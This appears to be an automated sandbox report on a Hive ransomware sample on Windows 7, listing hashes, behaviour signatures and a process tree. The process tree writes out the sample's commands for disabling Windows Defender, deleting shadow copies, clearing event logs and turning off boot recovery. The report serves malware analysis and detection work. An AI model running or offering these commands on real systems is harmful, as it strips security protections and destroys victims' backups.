Analysis
-
max time kernel
4s -
max time network
0s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 10:02
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Hive.elf
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
hive_linux_elf
Resource
win7-20240221-en
Behavioral task
behavioral5
Sample
linux_hive.elf
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20240221-en
General
-
Target
211xahcou.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 292 MpCmdRun.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 2996 wevtutil.exe 1744 wevtutil.exe 1740 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2104 bcdedit.exe 1712 bcdedit.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2484 sc.exe 2884 sc.exe 1348 sc.exe 2444 sc.exe 2588 sc.exe 2652 sc.exe 2436 sc.exe 2348 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 380 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2996 wevtutil.exe Token: SeBackupPrivilege 2996 wevtutil.exe Token: SeSecurityPrivilege 1744 wevtutil.exe Token: SeBackupPrivilege 1744 wevtutil.exe Token: SeSecurityPrivilege 1740 wevtutil.exe Token: SeBackupPrivilege 1740 wevtutil.exe Token: SeIncreaseQuotaPrivilege 960 wmic.exe Token: SeSecurityPrivilege 960 wmic.exe Token: SeTakeOwnershipPrivilege 960 wmic.exe Token: SeLoadDriverPrivilege 960 wmic.exe Token: SeSystemProfilePrivilege 960 wmic.exe Token: SeSystemtimePrivilege 960 wmic.exe Token: SeProfSingleProcessPrivilege 960 wmic.exe Token: SeIncBasePriorityPrivilege 960 wmic.exe Token: SeCreatePagefilePrivilege 960 wmic.exe Token: SeBackupPrivilege 960 wmic.exe Token: SeRestorePrivilege 960 wmic.exe Token: SeShutdownPrivilege 960 wmic.exe Token: SeDebugPrivilege 960 wmic.exe Token: SeSystemEnvironmentPrivilege 960 wmic.exe Token: SeRemoteShutdownPrivilege 960 wmic.exe Token: SeUndockPrivilege 960 wmic.exe Token: SeManageVolumePrivilege 960 wmic.exe Token: 33 960 wmic.exe Token: 34 960 wmic.exe Token: 35 960 wmic.exe Token: SeIncreaseQuotaPrivilege 3040 wmic.exe Token: SeSecurityPrivilege 3040 wmic.exe Token: SeTakeOwnershipPrivilege 3040 wmic.exe Token: SeLoadDriverPrivilege 3040 wmic.exe Token: SeSystemProfilePrivilege 3040 wmic.exe Token: SeSystemtimePrivilege 3040 wmic.exe Token: SeProfSingleProcessPrivilege 3040 wmic.exe Token: SeIncBasePriorityPrivilege 3040 wmic.exe Token: SeCreatePagefilePrivilege 3040 wmic.exe Token: SeBackupPrivilege 3040 wmic.exe Token: SeRestorePrivilege 3040 wmic.exe Token: SeShutdownPrivilege 3040 wmic.exe Token: SeDebugPrivilege 3040 wmic.exe Token: SeSystemEnvironmentPrivilege 3040 wmic.exe Token: SeRemoteShutdownPrivilege 3040 wmic.exe Token: SeUndockPrivilege 3040 wmic.exe Token: SeManageVolumePrivilege 3040 wmic.exe Token: 33 3040 wmic.exe Token: 34 3040 wmic.exe Token: 35 3040 wmic.exe Token: SeIncreaseQuotaPrivilege 3040 wmic.exe Token: SeSecurityPrivilege 3040 wmic.exe Token: SeTakeOwnershipPrivilege 3040 wmic.exe Token: SeLoadDriverPrivilege 3040 wmic.exe Token: SeSystemProfilePrivilege 3040 wmic.exe Token: SeSystemtimePrivilege 3040 wmic.exe Token: SeProfSingleProcessPrivilege 3040 wmic.exe Token: SeIncBasePriorityPrivilege 3040 wmic.exe Token: SeCreatePagefilePrivilege 3040 wmic.exe Token: SeBackupPrivilege 3040 wmic.exe Token: SeRestorePrivilege 3040 wmic.exe Token: SeShutdownPrivilege 3040 wmic.exe Token: SeDebugPrivilege 3040 wmic.exe Token: SeSystemEnvironmentPrivilege 3040 wmic.exe Token: SeRemoteShutdownPrivilege 3040 wmic.exe Token: SeUndockPrivilege 3040 wmic.exe Token: SeManageVolumePrivilege 3040 wmic.exe Token: 33 3040 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2224 wrote to memory of 2944 2224 211xahcou.exe 28 PID 2224 wrote to memory of 2944 2224 211xahcou.exe 28 PID 2224 wrote to memory of 2944 2224 211xahcou.exe 28 PID 2944 wrote to memory of 636 2944 net.exe 30 PID 2944 wrote to memory of 636 2944 net.exe 30 PID 2944 wrote to memory of 636 2944 net.exe 30 PID 2224 wrote to memory of 2336 2224 211xahcou.exe 31 PID 2224 wrote to memory of 2336 2224 211xahcou.exe 31 PID 2224 wrote to memory of 2336 2224 211xahcou.exe 31 PID 2336 wrote to memory of 2680 2336 net.exe 33 PID 2336 wrote to memory of 2680 2336 net.exe 33 PID 2336 wrote to memory of 2680 2336 net.exe 33 PID 2224 wrote to memory of 1808 2224 211xahcou.exe 34 PID 2224 wrote to memory of 1808 2224 211xahcou.exe 34 PID 2224 wrote to memory of 1808 2224 211xahcou.exe 34 PID 1808 wrote to memory of 2564 1808 net.exe 36 PID 1808 wrote to memory of 2564 1808 net.exe 36 PID 1808 wrote to memory of 2564 1808 net.exe 36 PID 2224 wrote to memory of 2572 2224 211xahcou.exe 37 PID 2224 wrote to memory of 2572 2224 211xahcou.exe 37 PID 2224 wrote to memory of 2572 2224 211xahcou.exe 37 PID 2572 wrote to memory of 2632 2572 net.exe 39 PID 2572 wrote to memory of 2632 2572 net.exe 39 PID 2572 wrote to memory of 2632 2572 net.exe 39 PID 2224 wrote to memory of 2644 2224 211xahcou.exe 40 PID 2224 wrote to memory of 2644 2224 211xahcou.exe 40 PID 2224 wrote to memory of 2644 2224 211xahcou.exe 40 PID 2644 wrote to memory of 2576 2644 net.exe 42 PID 2644 wrote to memory of 2576 2644 net.exe 42 PID 2644 wrote to memory of 2576 2644 net.exe 42 PID 2224 wrote to memory of 2772 2224 211xahcou.exe 43 PID 2224 wrote to memory of 2772 2224 211xahcou.exe 43 PID 2224 wrote to memory of 2772 2224 211xahcou.exe 43 PID 2772 wrote to memory of 2284 2772 net.exe 45 PID 2772 wrote to memory of 2284 2772 net.exe 45 PID 2772 wrote to memory of 2284 2772 net.exe 45 PID 2224 wrote to memory of 2972 2224 211xahcou.exe 46 PID 2224 wrote to memory of 2972 2224 211xahcou.exe 46 PID 2224 wrote to memory of 2972 2224 211xahcou.exe 46 PID 2972 wrote to memory of 2692 2972 net.exe 48 PID 2972 wrote to memory of 2692 2972 net.exe 48 PID 2972 wrote to memory of 2692 2972 net.exe 48 PID 2224 wrote to memory of 2452 2224 211xahcou.exe 49 PID 2224 wrote to memory of 2452 2224 211xahcou.exe 49 PID 2224 wrote to memory of 2452 2224 211xahcou.exe 49 PID 2452 wrote to memory of 2604 2452 net.exe 51 PID 2452 wrote to memory of 2604 2452 net.exe 51 PID 2452 wrote to memory of 2604 2452 net.exe 51 PID 2224 wrote to memory of 2444 2224 211xahcou.exe 52 PID 2224 wrote to memory of 2444 2224 211xahcou.exe 52 PID 2224 wrote to memory of 2444 2224 211xahcou.exe 52 PID 2224 wrote to memory of 2588 2224 211xahcou.exe 54 PID 2224 wrote to memory of 2588 2224 211xahcou.exe 54 PID 2224 wrote to memory of 2588 2224 211xahcou.exe 54 PID 2224 wrote to memory of 2652 2224 211xahcou.exe 56 PID 2224 wrote to memory of 2652 2224 211xahcou.exe 56 PID 2224 wrote to memory of 2652 2224 211xahcou.exe 56 PID 2224 wrote to memory of 2436 2224 211xahcou.exe 58 PID 2224 wrote to memory of 2436 2224 211xahcou.exe 58 PID 2224 wrote to memory of 2436 2224 211xahcou.exe 58 PID 2224 wrote to memory of 2348 2224 211xahcou.exe 60 PID 2224 wrote to memory of 2348 2224 211xahcou.exe 60 PID 2224 wrote to memory of 2348 2224 211xahcou.exe 60 PID 2224 wrote to memory of 2484 2224 211xahcou.exe 62 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:636
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2680
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2564
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2632
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2576
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2284
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2692
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2604
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:2444
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2588
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:2652
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2436
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:2884
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2704
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2696
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2740
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2852
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2856
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1324
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1584
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2392
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2304
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1196
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1972
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2016
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1776
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1720
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1904
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:540
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:780
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:596
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2212
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1528
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1760
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1420
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2916
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:856
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:308
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2252
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2788
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2272
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2068
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1788
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:500
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:380
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2104
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1712
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2316
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:292
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1500
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵PID:2936
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj
Filesize8KB
MD567712d2b91a7486b24620ff191e41b1f
SHA1a0a87c87aa13a693d89ad290e28a86ad5716de44
SHA25683cad2fa923aa374c1c57d793a1732f555f747e2a90f82879df4b5753658c7f6
SHA5126f073ef74b80b91405c21c7a062f3172b1c19de8e8a611e0995878b996681eb00ebb80afac0bd628a931e1f148a9ddaa0969689e4058b816a3200973d546ed91
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj
Filesize12KB
MD57be06090bd2ed024b2719937fb991ef2
SHA19377ded1f1aca714ed0efb6140d1236435608c34
SHA256c8ee9390df4e6bc13aa9269546d35650e57e69d8100325b28a8ff229c5d337c3
SHA5128473f625bf623ac496a91ec70f7375bc97bc492b97d99d0b195d0a94c0c7e504719cb5c07c1048106549a75ade6839f6ff8cdb29d7fb7f81f5897e9f03d24c22
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj
Filesize7KB
MD5a6cb8eb536643c76fad3eb3b5aaa9c85
SHA153c327679f478845a0c4d8e6b8f8358468e0b608
SHA256998df3165f1ce3c6c58cf7e331d2cc00151fe71a74d24dc99dd7cfbd0f17e73b
SHA512b78cc0fcf9ad7d92757ff2573a847454d899409bab0af6ced053d5062cc1d29517bb4ab18dc54f020732c775ab8a7aa86d92a90638af21b87393df6cb785dbee
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj
Filesize57B
MD5adf99b54fd6f317b611320564167c305
SHA1d3d80dd39b686e04bf31db6ac9335084e841ef73
SHA2561b68454d53e781f8793547fde8fcb2f3b03b5c8134f37b9d8c4045cb8a5473f3
SHA51265fb44cdaf01632d60ecf3b49ab1eb661982ee8b6a430dcf6d1e75789787c9e7356754cd071421ca44a1b32ab918be97a630b1b0ca722383eea56d40fa131642
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52d0ddf8a3d0db54112ae9099ac882e8e
SHA12f2b6285016a2be62d74fbe227b6b21d67ba6469
SHA256575db2c75918557c6eabdd7db54bd7e7fe4228e752b1ac0a75d2c34ae747c3c7
SHA512514b6dabc61eef9a6ba21770ee6c2fbd7f41aefbaac7a42d2863a323923585391c98173d244a90aaa63075c1bf6568b7322145eea5878a1334acc1dc556cb659